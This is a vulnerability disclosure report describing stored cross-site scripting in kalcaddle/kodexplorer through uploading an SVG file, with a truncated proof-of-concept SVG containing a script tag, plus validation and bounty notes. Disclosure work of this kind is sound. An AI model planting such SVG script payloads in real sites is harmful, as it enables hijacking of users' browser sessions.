Cross-site Scripting (XSS) - Stored in kalcaddle/kodexplorer


Reported on

Aug 3rd 2021

✍️ Description

XSS via SVG file Upload

🕵️‍♂️ Proof of Concept

upload the svg file with xss payload and open it with browser

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "

<svg version="1.1" baseProfile="full" xmlns="
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width
:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">

💥 Impact

Custom JS code execution embedded with in the svg file


We have contacted a member of the kalcaddle/kodexplorer team and are waiting to hear back 3 years ago
Ajmal Aboobacker modified the report
3 years ago
3 years ago


config set disable file ext

warlee validated this vulnerability 3 years ago
b3ef has been awarded the disclosure bounty
The fix bounty is now up for grabs
to join this conversation